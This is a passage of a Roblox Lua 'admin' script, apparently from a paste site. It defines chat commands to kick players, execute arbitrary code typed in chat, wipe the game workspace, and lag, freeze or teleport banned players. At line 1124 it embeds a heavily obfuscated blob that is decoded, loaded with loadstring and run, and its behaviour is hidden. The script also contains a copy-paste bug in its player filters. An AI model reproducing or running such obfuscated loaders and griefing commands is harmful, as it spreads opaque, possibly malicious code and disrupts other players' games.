  915. AddCmd("Check source","chks","Check if the source is found",
  916. function()
  917. if found then
  918. Output("Source is found")
  919. else
  920. Output("Source is not found")
  921. end
  922. end
  923. )
  924.  
  925. AddCmd("Say bye to everyone","bye","Say bye to everyone",
  926. function()
  927. Dismiss()
  928. for i = 1,8 do
  929. Output("Bye", __)
  930. end
  931. end
  932. )
  933.  
  934. AddCmd("Check source name","chksn","Check the source name",
  935. function()
  936. Output(SourceName, __)
  937. end
  938. )
  939.  
  940. AddCmd("Change source name","csn","Change the source name",
  941. function(plrs, msg)
  942. SourceName = tostring(msg)
  943. end
  944. )
  945.  
  946. AddCmd("Kick player list","klist", "Show a kick player list",
  947. function()
  948. Dismiss()
  949. Output("Click on the player name that you want to kick", __)
  950. for _,v in pairs(game:GetService("Players"):GetChildren()) do
  951. Output(v.Name,
  952. function()
  953. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
  954. v:Destroy()
  955. end)
  956. end
  957. end
  958. )
  959.  
  960. AddCmd("Script","script","Execute a Script",
  961. function(plrs, msg)
  962. NewS(msg, workspace)
  963. end
  964. )
  965.  
  966. AddCmd("LocalScript","local","Execute a LocalScript",
  967. function(plrs, msg)
  968. NewLS(msg, LocalPlayer.Backpack)
  969. end
  970. )
  971.  
  972. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  973. function(plrs, msg)
  974. a,b = ypcall(function()
  975. loadstring(msg)()
  976. end) if not a then Output(b,"Bright red") end
  977. end
  978. )
  979.  
  980.  
  981. AddCmd("#Commands","#cmds","See how much are commands in this admin",
  982. function()
  983. Output(#Cmds, __)
  984. end
  985. )
  986.  
  987. AddCmd("Clean workspace","clean","Clean everything in workspace except terrain",
  988. function()
  989. NewS([[
  990. for _,v in pairs(game.Workspace:GetChildren()) do
  991. if v.Name ~= "Terrain" then
  992. v:Destroy()
  993. end
  994. end
  995. ]],workspace)
  996. wait(1)
  997. a = Instance.new("Part")
  998. a.Parent = Workspace
  999. a.Name = "Base"
  1000. a.Position = Vector3.new(0, 0.6, 0)
  1001. a.Size = Vector3.new(1002, 0, 1002)
  1002. a.Material = "Grass"
  1003. a.Anchored = true
  1004. a.BrickColor = BrickColor.new("Dark green")
  1005. NewS([[
  1006. for _,v in pairs(game.Players:GetChildren()) do
  1007. v:LoadCharacter()
  1008. end
  1009. ]], workspace)
  1010. end
  1011. )
  1012.  
  1013. AddCmd("YOLO","yolo","YOLO",
  1014. function()
  1015. Dismiss()
  1016. for i = 0,8,1 do
  1017. Output("YOLO",__)
  1018. end
  1019. end
  1020. )
  1021.  
  1022. AddCmd("SWAG","swag","SWAG",
  1023. function()
  1024. Dismiss()
  1025. for i = 0,8,1 do
  1026. Output("SWAG",__)
  1027. end
  1028. end
  1029. )
  1030.  
  1031. function Output(Txt, func)
  1032. P = Instance.new("Part", tabmodel)
  1033. P.Shape = "Ball"
  1034. P.Anchored = true
  1035. P.CanCollide = false
  1036. if probemode == false then
  1037. if LocalPlayer.Character.Torso then
  1038. P.Position = LocalPlayer.Character.Torso.Position
  1039. elseif LocalPlayer.Character.Torso == nil then return end
  1040. elseif probemode == true then
  1041. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1042. P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1043. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end
  1044. else
  1045. return
  1046. end
  1047. M = Instance.new("SpecialMesh",P)
  1048. M.MeshId = "http://www.roblox.com/asset/?id=10061232"
  1049. M.TextureId = "http://www.roblox.com/asset/?id=10061209"
  1050. M.Scale = Vector3.new(3,3,3)
  1051. Instance.new("PointLight", P)
  1052. bg = Instance.new("BillboardGui", P)
  1053. bg.Adornee = tab
  1054. bg.Size = UDim2.new(8, 0, 7.5, 0)
  1055. bg.StudsOffset = Vector3.new(0, 1, 0)
  1056. text = Instance.new("TextLabel", bg)
  1057. text.Size = UDim2.new(1, 0, 0.2, 0)
  1058. text.FontSize = "Size18"
  1059. text.BackgroundTransparency = 1
  1060. text.Font = "Legacy"
  1061. text.TextStrokeTransparency = 0
  1062. text.TextColor = P.BrickColor
  1063. text.Text = Txt
  1064. Click = Instance.new("ClickDetector",P)
  1065. Click.MouseClick:connect(function(Plr)
  1066. if Plr.Name == LocalPlayer.Name then
  1067. Dismiss()
  1068. func = func
  1069. func()
  1070. end
  1071. end)
  1072. table.insert(Tabs, P)
  1073. end
  1074.  
  1075. function getPlayers(msg)
  1076. local plrs = {}
  1077. if msg == "me" then
  1078. table.insert(plrs, LocalPlayer)
  1079. elseif msg == "all" then
  1080. plrs = game:GetService("Players"):GetChildren()
  1081. elseif msg == "noobs" then
  1082. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1083. if plr.AccountAge > 364 then
  1084. table.insert(plrs, plr)
  1085. end
  1086. end
  1087. elseif msg == "veterans" then
  1088. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1089. if plr.AccountAge > 364 then
  1090. table.insert(plrs, plr)
  1091. end
  1092. end
  1093. elseif msg == "others" then
  1094. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1095. if v ~= LocalPlayer then
  1096. table.insert(plrs, v)
  1097. end
  1098. end
  1099. else
  1100. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1101. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1102. if v.Name == "aleksa12432" then
  1103. Output("You can't use commands on creator!!!")
  1104. else
  1105. table.insert(plrs, v)
  1106. end
  1107. end
  1108. end
  1109. end
  1110. return plrs
  1111. end
  1112.  
  1113. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1114. end
  1115.  
  1116. LocalPlayer.Chatted:connect(function(m)
  1117. for i,v in pairs(Cmds) do
  1118. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1119. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1120. end
  1121. end
  1122. end)
  1123.  
  1124. local charMap = {["!"] = 0, ["$"] = 1, ["*"] = 2, ["("] = 3, ["-"] = 4, ["#"] = 5, ["%"] = 6, ["?"] = 7, ["="] = 8, ["&"] = 9, ["_"] = 10, ["+"] = 11, ["~"] = 12, [")"] = 13, ["^"] = 14, ["@"] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1125. "~%@%(%$%~%!*&%)()*$(+(~%@%$%-%(?-?*?&%^%?%=*(?-?*?&%^%?%^*?%(?#?*%=A*%A=+?=?*=#()?!#@(*-+-+?)?^%!?^?^?+?$?#?)%)*B?-?_%^A%~*-%@%!?~#~#$*~#!(*(%(#^%^=)-A)@=%)=_%&=&!_@~!)!~$~^~)~&~^+$~=+??!~@A+!+(+__@%%_!+!++&@#?#~!~!)@=@!!$+?@=~#+%+)+!^@^~^+)#^-^#&%)%)#~#~$)@~_~^+!~%+-?~+_+#+&_+_$_#%+&-_(_)=!#?-!~*^))#)%)$)$=??%_!~^_?++?)#+#(%@#&?=&==*=&=&%$=*?%=^%??@*+-_#*%%#&$&!--!-%!(^-*%-$-&(_(#(#^+)~!%$&$~!-$^!*!&+&A!)_^~%^(@$@$^#&#^^~+~=)*=$~-&#&=&*=*?)_&_@%~-)=@A_*_(_^&^A-$%~=+?(?*=&?=?#?^$+#=%?#=*~#^%&-!_#+^&@_--@(&(=(-(&**(&*&$~#**$^~)$^-~!#-%=!_@*+@^%@+^)^$@+)?_-_*_)&=&-=_=_?#+$+??-##&?+*+__+_%_%#~-&%^=?=)?$=*(+?@%%*%?)%~#!(*(%(&%?#(#~#^%-&?#?-!-?@#==&+(#($($*_*~$?**)=)*+~#^%#$~-@$!*(*=@?-~#!(*(%(+$^$(@#@!@%_(_!==A)~)%=+~_=_?~~*??+=+%%*+@&(_=_#_%#)%(&%=$&(-%(%?)?-$##??*?_%+B%$!%$--!~*+((-?(!@?**@~~-*@*-*#$~#**($#$!$=!+)~)@)!~)&^)!!)(@!@!$$)A^&^&&@=)__~-)!~+~^+$~$~*+^^(+^_%?=#%#^#_#^&@?*-!%)??=(?^*#%!(!*+#?#)$_@+()#=#!#$#~-~@*@$*+(#*?*$**@-)*)_)"
  1126. ,"%)~#!(*(%(+@^++^#@&!^_#^!+!_+)?))&_?++))=)!)$)~~~?*?_&&_$+#_%?*&%#^=*#_##__+&&_?)(#%-?~?!?&*!%+*)#^*)*^*)-&-@!~^(-=-_(+@=)@*-(%*=~@$-*%$=+()$^=^+)-^#)~)($@$#$?!#$?!~#^%%!)+#@=+#@%~@^^_$+=+~^~)=^%^!^&)===)%)$)#~$!#~)@@~@~$)&?+_)_(_$+-%$%&_?_*_%&=&))$@!#$=#&)=+?+((?%(#(-(+(_(&*-%$*~#!(*(%(*$$*$*@$@!=-^-$-(!!!)@&@$(%@-%~%!%_%~#~#-%~&&_!_(&*_#&&&%&^-?=+-&=+##=#-&-$#%=??-=(=^?=?=*&?=?-?&%~%(%=*+#^###-%=$%$@#^#_#@-*#&-^!!-##^-)(^@?(+@+@+@)@_@$!$@!@~*_^-^)))^^^)^^)=$@$($%)-)$)!)%_@_-_@_*_+_-^*@_^^)^^*^?^#^^&=))&~)@__)+&!_&_@)$)@)@)+)%)?=&)&)%)~~!)=~^=*~%~^+^~(=*=~~~~&~@+(~++$=-+_~-~-+%?!+#?%?+?+?^?*?@_^%&%(%-?%?%?=%(_+_!_-%(%$%$%**~***^***~*%%#?^%(%-?&%@%^%=*(%&*&%)(&%+*$(+(*?#%-?#?*?^%!*(?-?*?&%^%?%^*(%=%$%*?=*=*(?-?*?&%^%?%^**%&?-?#%=*(%&*+*)**(%(+*&%&*#*!**(#(%(&*#%^%-%&*&*=*&*"
  1127. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())()
  1128.  
  1129. tabmodeldebounce = false
  1130. modeldebounce = false
  1131. game:service'RunService'.Stepped:connect(function()
  1132. if modeldebounce then return end
  1133. rot = (rot % 360) + 0.5
  1134. if tabmodel.Parent ~= workspace then
  1135. modeldebounce = true
  1136. tabs = {}
  1137. tabmodel = Instance.new("Model", workspace)
  1138. tabmodel.Name = "Earth tabs"
  1139. tabs = {}
  1140. wait()
  1141. modeldebounce = false
  1142. end
  1143. end)
  1144.  
  1145. rot = 0
  1146. coroutine.resume(coroutine.create(function()
  1147. game:GetService("RunService").Stepped:connect(function()
  1148. if probemode == false then
  1149. if LocalPlayer.Character then
  1150. if LocalPlayer.Character:findFirstChild("Torso") then
  1151. rot = rot + 0.001
  1152. for i,v in pairs(Tabs) do
  1153. ypcall(function()
  1154. local pos = LocalPlayer.Character.Torso.CFrame
  1155. local radius = 4 + (#Tabs * 0.5)
  1156. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1157. local y = 0
  1158. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1159. local arot = Vector3.new(x, y, z) + pos.p
  1160. local brot = v.CFrame.p
  1161. local crot = (arot * .1 + brot * .9)
  1162. v.CFrame = CFrame.new(crot, pos.p)
  1163. end)
  1164. end
  1165. end
  1166. end
  1167. end
  1168. if probemode == true then
  1169. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1170. rot = rot + 0.001
  1171. for i,v in pairs(Tabs) do
  1172. ypcall(function()
  1173. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1174. local radius = 4 + (#Tabs * 0.5)
  1175. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1176. local y = 0
  1177. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1178. local arot = Vector3.new(x, y, z) + pos.p
  1179. local brot = v.CFrame.p
  1180. local crot = (arot * .1 + brot * .9)
  1181. v.CFrame = CFrame.new(crot, pos.p)
  1182. end)
  1183. end
  1184. end
  1185. end
  1186. end)
  1187. end))
  1188.  
  1189. for _,v in pairs(game.Players:GetChildren()) do
  1190. if v:IsA("Player") then
  1191. Connect(v)
  1192. end
  1193. end
  1194.  
  1195. game.Players.ChildAdded:connect(function(qe)
  1196. if qe:IsA("Player") then
  1197. Connect(qe)
  1198. end
  1199. end)
  1200.  
  1201. coroutine.resume(coroutine.create(function()
  1202. while wait(0.1) do
  1203. for a, plr in pairs(game.Players:GetChildren()) do
  1204. pcall(function()
  1205. for b, Bl in pairs(Banlist) do
  1206. if plr.Name == Bl["Name"] then
  1207. if Bl["BRank"] == -1 then
  1208. plr:Destroy()
  1209. elseif Bl["BRank"] == -2 then
  1210. NewLS(LagSource, plr.Backpack)
  1211. elseif Bl["BRank"] == -3 then
  1212. NewLS("script.Parent = nil; while wait(0.1) do; game:service'StarterGui':SetCoreGuiEnabled(3, false); end", plr.Backpack)
  1213. elseif Bl["BRank"] == -4 then
  1214. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  1215. else
  1216. plr:Destroy()
  1217. end
  1218. end
  1219. end
  1220. end)
  1221. end
  1222. end
  1223. end))
  1224.  
  1225. for _,v in pairs(game.Players:GetPlayers()) do
  1226. if v.Name == "aleksa12432" then
  1227. Output("YAY, THE CREATOR OF THIS SCRIPT IS IN-GAME :D :D :D")
  1228. end
  1229. end
  1230.  
  1231. game.Players.PlayerAdded:connect(function(plr)
  1232. if plr.Name == "aleksa12432" then
  1233. Output("YAY, THE CREATOR OF THIS SCRIPT IS IN-GAME :D :D :D")
  1234. end
  1235. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement